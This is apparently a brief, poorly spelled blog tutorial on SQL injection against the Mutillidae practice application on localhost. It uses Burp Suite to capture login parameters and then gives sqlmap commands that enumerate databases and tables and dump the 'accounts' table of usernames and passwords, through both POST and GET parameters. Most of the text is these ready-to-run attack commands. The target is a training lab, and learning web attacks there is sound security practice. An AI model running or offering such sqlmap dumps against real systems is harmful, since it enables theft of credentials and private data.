first
Run apache and mysql
Run bwoser Mantra
set Proxy localhost port 8080
and go to OWASP To 10 >SQL
Injection > SQLi Baypass Autentication>Login
Run burpsuite make sure intercept is on
POST Parameter
type on form :
Name : admin and password: password
cek on burpsuite...
look at the last bar,,
“username=admin&password=1234&login-php-submit-button=Login”
it wii be enumere use POST parameter
copy url tu set -u option in sqlmap and parameter post get from burpsuite
sqlmap#
./sqlmap.py -u http://localhost/mutillidae/index.php?page=login.php
–data="username=admin&password=1234&login-php-submit-button=Login"
--dbs
any question to unsware couse there
multiple injection points,
0 Post parameter username
1 Post paramater password
type 0 and than Y
--dbs : enumeret DBMS database
/sqlmap# ./sqlmap.py -u
http://localhost/mutillidae/index.php?page=login.php
--data="username=admin&password=1234&login-php-submit-button=Login"
-D nowasp --tables
-D nowasp :
--tables
:
we want to get password and user, so we
mast enumere “account” table
/sqlmap# ./sqlmap.py -u
http://localhost/mutillidae/index.php?page=login.php
--data="username=admin&password=1234&login-php-submit-button=Login"
-T accounts --dump
-T accounts
--dump
cek one of user and password dump
Parameter GET
/sqlmap# ./sqlmap.py -u
"localhost/mutillidae/index.php?page=user-info.php&username=aaa&password=123&user-info-php-submit-button=View+Account+Details"
--dbs
/sqlmap# ./sqlmap.py -u
"localhost/mutillidae/index.php?page=user-info.php&username=aaa&password=123&user-info-php-submit-button=View+Account+Details"
-D nowasp --tables
/sqlmap# ./sqlmap.py -u
"localhost/mutillidae/index.php?page=user-info.php&username=aaa&password=123&user-info-php-submit-button=View+Account+Details"
-T accounts --dump
cool
BalasHapus